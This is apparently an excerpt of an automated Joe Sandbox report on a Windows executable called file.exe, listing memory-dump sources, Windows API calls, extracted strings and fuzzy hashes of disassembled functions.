                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                        • String ID: U
                                                                                        • API String ID: 2456169464-4171548499
                                                                                        • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                        • Instruction ID: 665b05244de610005cfcbc6c9f75baecf5dc84290a4b812ea2169b161a4fafec
                                                                                        • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                        • Instruction Fuzzy Hash: 3841F422618A8182EB209F25E8143B9B7A5FB887A4F845035EE4D87784EF3CD582C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1429681911-3916222277
                                                                                        • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                        • Instruction ID: 6bba412bc0fa77cbec7cfe77a74aaca71ef7006f0b464454f0caa8923966d84d
                                                                                        • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                        • Instruction Fuzzy Hash: E331083561874286EA14EF12FC1862AB7A1FB8DFD9F905835ED4A43B58CF3CE4498B10
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8BB
                                                                                        • CreateSemaphoreW.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8CB
                                                                                        • CreateEventW.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID: Thread pool initialization failed.
                                                                                        • API String ID: 3340455307-2182114853
                                                                                        • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                        • Instruction ID: 3846f4a340d4c65bb3e5fe29a7eab3c573392ba42550c4f523c962b19b6c84db
                                                                                        • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                        • Instruction Fuzzy Hash: 9E21D532E1964187F750AF34D8447A972E2EF9CB1CF58A038CA0D4A295CF7EA485C7A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceRelease
                                                                                        • String ID:
                                                                                        • API String ID: 127614599-3916222277
                                                                                        • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                        • Instruction ID: 1235eee33cf86cfe6e4bd8c9ae959ecbe66839a1ea335bca50d146319228d98e
                                                                                        • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                        • Instruction Fuzzy Hash: CAE08C20B08A4182EB086BB6F98903AB361EB4CBD4F55A835DA1A87798CE3CC8844310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                        • String ID:
                                                                                        • API String ID: 1137671866-0
                                                                                        • Opcode ID: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
                                                                                        • Instruction ID: c18220047df8be6058fa3e52a66865e0f98f572a77adfa8c7cd0d3129b0ecf65
                                                                                        • Opcode Fuzzy Hash: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
                                                                                        • Instruction Fuzzy Hash: B2A1D662A5878291EA20EB65ED401EDA375FF99794FC06132EB8C03AE9DF3CE545C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 4871fa0c943a6bda4a75b5c3ad29a9496d44a7a9e564bd7977e1d2a914031524
                                                                                        • Instruction ID: 1d6e707bf7caf7f3d511cdfb4f2ca3d11337e6e516387404ec618d29249cab94
                                                                                        • Opcode Fuzzy Hash: 4871fa0c943a6bda4a75b5c3ad29a9496d44a7a9e564bd7977e1d2a914031524
                                                                                        • Instruction Fuzzy Hash: 5451C162B15A4285FB00BB74D8442FCA321EFDCB98F806636DA5C577DADF28D141C360
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1077098981-0
                                                                                        • Opcode ID: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
                                                                                        • Instruction ID: e0e45a5a7c0b674c6d8fe9985755a273c0c0846fd6888b31589744f449c13a37
                                                                                        • Opcode Fuzzy Hash: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
                                                                                        • Instruction Fuzzy Hash: 97514A32A18B4286EB50AF21F8443AEB3A4FFD8B84F942035EA4D57A58DF3CD554CB10
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 4141327611-0
                                                                                        • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction ID: 5fa194005334d89805691328cd090a6f5e240a2e5688d347f22d500e93042e88
                                                                                        • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction Fuzzy Hash: 1141A632A0C6424AF775AF10D844379E291EFA8B90F946135DBDD47AD9DF7CD8818720
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3823481717-0
                                                                                        • Opcode ID: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
                                                                                        • Instruction ID: 06f7383c5d7e2eaf589fd1405195984703907949e6ea267fd3ad347a6a6f5917
                                                                                        • Opcode Fuzzy Hash: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
                                                                                        • Instruction Fuzzy Hash: 9441AF62F14B5194FB00EFB5EC451AC6375FF48BA8B806235EE5D2BA99DF38D481C210
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0B91
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0BF3
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0C2D
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70E7BC45B), ref: 00007FF70E7C0C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID:
                                                                                        • API String ID: 1557788787-0
                                                                                        • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction ID: 03e931c52e0e83a3cf20cc46315dbdff7f223cc206821f1bb3eaf06f88dcdac4
                                                                                        • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction Fuzzy Hash: 20215421B18B5181E634AF11EC40069E6A9FF98BE0B885138DE9D63B94DF3CE4928754
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$abort
                                                                                        • String ID:
                                                                                        • API String ID: 1447195878-0
                                                                                        • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction ID: 9d1e5fd023293be9814469024786b75861dfa39803f51d9aca96a4d70727a438
                                                                                        • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction Fuzzy Hash: 13018C10B0C60342FA6CB771EE5937891A59F6CB90F842538DEAE467D6EF2CB8454231
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction ID: b815195da34dd7f87fd7441ca6645f85d5087e28f9f053c1f8c9293eab45cdc3
                                                                                        • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction Fuzzy Hash: 07E0E560E0560542FF087B71EC59135B254DF4CB45F98983AC81E46360DF3C94458720
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: DXGIDebug.dll
                                                                                        • API String ID: 3668304517-540382549
                                                                                        • Opcode ID: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
                                                                                        • Instruction ID: f1550668863ff8f5d14534a0c8860a668ea7dad60d4bb1bb292fd78415957304
                                                                                        • Opcode Fuzzy Hash: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
                                                                                        • Instruction Fuzzy Hash: 2F71BD72A15B8182EB14DF25E9403ADB3A8FF58794F845236DBAD07B99DF78D061C300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: e+000$gfff
                                                                                        • API String ID: 3215553584-3030954782
                                                                                        • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction ID: 8fac3ebcb26e69f47f42744e5d0ede9c27654b38756236fd1690d351e1375e58
                                                                                        • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction Fuzzy Hash: FE511462B187C546E7259B35DC413A9BB91EFA9B90F88A231CADC87BD5CF2CE444C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                        • String ID: SIZE
                                                                                        • API String ID: 449872665-3243624926
                                                                                        • Opcode ID: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
                                                                                        • Instruction ID: 0080c2b68346ce50e22f29beae28d9e981b5f895194c95697985b80ca427e6dd
                                                                                        • Opcode Fuzzy Hash: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
                                                                                        • Instruction Fuzzy Hash: BA41B562A1878285FE10EB24E8413BEA350EFD9790FD06235EB9D466D6EF3DD540C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                                        • API String ID: 3307058713-3695852857
                                                                                        • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                        • Instruction ID: 1e9e622225ab5c7b77e9344676a7456426e4438c1446c98167de74c0df662150
                                                                                        • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                        • Instruction Fuzzy Hash: 1A416176A08A5286EB15EF25EC402B8F794EF9C7D4BC4A036EA8D47745DF3DE4418360
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                        • Instruction ID: 1588364ee27772b97adad8f14d8d618c676a9bc3d9ae7b4aa2d461fe25d62b63
                                                                                        • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                        • Instruction Fuzzy Hash: 09418421A08A8281FA14FB22ED542B9A3A1AFDDBC4F986035DE4D07799DF3DE4518360
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
